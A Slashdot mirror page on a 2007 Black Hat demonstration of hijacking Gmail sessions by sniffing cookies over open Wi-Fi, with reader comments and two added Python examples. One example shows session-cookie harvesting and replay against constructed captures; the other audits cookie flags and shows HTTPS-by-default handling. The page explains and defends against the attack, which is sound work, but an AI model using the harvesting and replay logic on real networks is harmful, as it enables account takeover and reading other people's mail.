Slashdot Mirror


Point-and-Click Gmail Hacking Shown at Black Hat

not5150 writes "Using Gmail or most other webmail programs over an unsecured access point just got a bit more dangerous. At Black Hat Robert Graham, CEO of Errata Security, showed how to capture and clone session cookies very quickly over connections without encryption. He even hijacked a shocked attendee's Gmail account in the middle of his presentation. 'While Ou was typing, Graham was running Ferret and sniffing all the cookies that were being sent from Ou's laptop and Google. Graham then clicked on Ou's IP address and Gmail page, complete with Ou's recently sent message on the screen. We photographed both Graham's and Ou's laptop at that time and posted it to the picture gallery. You'll see that the contents are exactly the same.'"
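What the demo above boils down to, as an added example (not Ferret's code, and not from the original post): a passive observer on the same open network reads the plaintext HTTP requests, pulls the Cookie header out of each one, keeps the values that act as session tokens, and replays them in a request of its own. The two captured requests, the hostnames and the cookie names SID and GX are constructed for this illustration and are not Gmail's real cookie set.

```python
from typing import Dict, List, Tuple

# Constructed sample of two plaintext HTTP requests as a passive sniffer on an
# open Wi-Fi network would see them. Hosts, paths and cookie values are made up;
# the cookie names SID and GX are assumed here to be the session tokens.
CAPTURED_REQUESTS: List[bytes] = [
    b"GET /mail/?ui=2 HTTP/1.1\r\n"
    b"Host: mail.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: SID=c0ffee1234; GX=DQAAAHUAAAC; pref=lang%3Den\r\n\r\n",
    b"GET /static/logo.png HTTP/1.1\r\n"
    b"Host: static.example.com\r\n"
    b"Cookie: pref=lang%3Den\r\n\r\n",
]

SESSION_COOKIE_NAMES = {"SID", "GX"}  # assumption, not Gmail's real cookie names


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Split one HTTP/1.x request into (method, path, lowercase-keyed headers)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    jar: Dict[str, str] = {}
    for part in value.split(";"):
        if "=" in part:
            name, val = part.strip().split("=", 1)
            jar[name] = val
    return jar


def harvest_sessions(requests: List[bytes]) -> Dict[str, Dict[str, str]]:
    """Map each host to the session cookies observed for it.

    Requests that carry only non-session cookies (the second sample) are skipped,
    which is the filtering a sidejacking tool does to show one entry per victim.
    """
    sessions: Dict[str, Dict[str, str]] = {}
    for raw in requests:
        _method, _path, headers = parse_request(raw)
        if "cookie" not in headers or "host" not in headers:
            continue
        jar = parse_cookie_header(headers["cookie"])
        tokens = {k: v for k, v in jar.items() if k in SESSION_COOKIE_NAMES}
        if tokens:
            sessions.setdefault(headers["host"], {}).update(tokens)
    return sessions


def clone_request(host: str, path: str, jar: Dict[str, str]) -> bytes:
    """Build the request the attacker's browser would send: same host, same
    cookies, no password involved. The server cannot tell the two clients apart."""
    cookie = "; ".join(f"{k}={v}" for k, v in jar.items())
    return (
        f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n"
    ).encode("latin-1")


if __name__ == "__main__":
    for host, jar in harvest_sessions(CAPTURED_REQUESTS).items():
        print(host, jar)
        print(clone_request(host, "/mail/", jar).decode("latin-1"))
```

Nothing here is cryptographic or clever; the whole attack is that the token which stands in for the password travels in the clear, so anyone who can read the frame can reuse it until the session expires or the victim logs out.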

6 of 260 comments

  1. Bottom line by Kadin2048 · Score: 5, Informative

    I think the upshot of this isn't really "look at us, we can sniff plaintext Wifi connections," but "look at one of the biggest players in web mail use plaintext connections even though they ought to know it's a hideously bad idea."

    It's more of an indictment of Google than anything, because they default to unencrypted HTTP rather than HTTPS, and most users won't know that they can go to https://mail.google.com/mail/ to force smarter behavior.

    --
    "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
  2. Re:Slow News day? by Anonymous Coward · Score: 5, Informative

    if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in.
    You have no idea how SSL works.
  3. Re:Could be fixed easily by Google. Shame. by Bob+535604 · Score: 5, Informative

    I fail to see how the average person, as usual, being lax about their security is in any way Google's fault. This was something I found immediately, just because I won't check my email without a secure connection.
    A lot of people wouldn't know about this or even look for it and you know it. Google could make https the default or even mandatory, and it would completely kill this entire issue.
  4. Re:Could be fixed easily by Google. Shame. by TheRaven64 · Score: 5, Insightful

    A huge part of security is having sane defaults. If you support 'secure' and 'insecure' you should default to 'secure,' and let users who know what they are doing, and need 'insecure' behaviour opt into it. You shouldn't default to 'insecure' and make it the users' responsibility to select 'secure.'

    --
    I am TheRaven on Soylent News
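The "default to secure" point in the comment above, as an added example rather than anything from the thread or from Google: a session cookie issued without the Secure attribute is sent by the browser on every http:// request, which is exactly what the sniffer in the story collects; with Secure set the browser withholds it on plaintext connections, and a handler that redirects plaintext requests to HTTPS before issuing anything means the user never has to know to type https. The Set-Cookie headers, host and token value are constructed; the Strict-Transport-Security header is a later standard (RFC 6797) than this 2007 thread and is included only to show where that defaulting moved afterwards.

```python
from http.cookies import SimpleCookie
from typing import Dict, List, Tuple

# Constructed Set-Cookie headers. The weak one is what the thread is complaining
# about: a session token the browser will happily send over plaintext HTTP.
WEAK_SET_COOKIE = "SID=c0ffee1234; Path=/; Domain=.example.com"
HARDENED_SET_COOKIE = "SID=c0ffee1234; Path=/; Domain=.example.com; Secure; HttpOnly"


def audit_set_cookie(header: str) -> List[str]:
    """Return one finding per missing protection on each cookie in the header."""
    jar = SimpleCookie()
    jar.load(header)
    findings: List[str] = []
    for name, morsel in jar.items():
        if not morsel["secure"]:
            findings.append(f"{name}: no Secure flag, browser will send it over http://")
        if not morsel["httponly"]:
            findings.append(f"{name}: no HttpOnly flag, readable from page script")
    return findings


def hardened_session_cookie(name: str, value: str) -> str:
    """Set-Cookie value for a session token that never leaves the browser in clear."""
    return f"{name}={value}; Path=/; Secure; HttpOnly"


def respond(scheme: str, host: str, path: str) -> Tuple[int, Dict[str, str], bytes]:
    """Illustrative secure-by-default handler (an assumption, not Google's code).

    Plaintext requests are redirected to HTTPS before any session cookie is
    issued, so the insecure transport is never where a session gets created.
    The HSTS header tells the browser to upgrade future http:// requests itself.
    """
    if scheme != "https":
        return 301, {"Location": f"https://{host}{path}"}, b""
    headers = {
        "Set-Cookie": hardened_session_cookie("SID", "c0ffee1234"),
        "Strict-Transport-Security": "max-age=31536000",
    }
    return 200, headers, b"<html>inbox</html>"


if __name__ == "__main__":
    print("weak:", audit_set_cookie(WEAK_SET_COOKIE))
    print("hardened:", audit_set_cookie(HARDENED_SET_COOKIE))
    print(respond("http", "mail.example.com", "/mail/"))
```

The audit function is the check to run against a real server's responses: if a cookie that grants access to the inbox comes back without Secure, the service is relying on every user choosing the https URL by hand, which is the opt-in-to-safety default the comment objects to.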
  5. Re:Slow News day? by Kartoffel · Score: 5, Informative

    That's easy enough to fix with a Firefox plugin: http://www.customizegoogle.com/

  6. Re:Slow News day? by tizan · Score: 5, Insightful

    I believe if you use https://gmail.google.com/ (note gmail instead of mail) your whole mail session is always encrypted and not the login page only.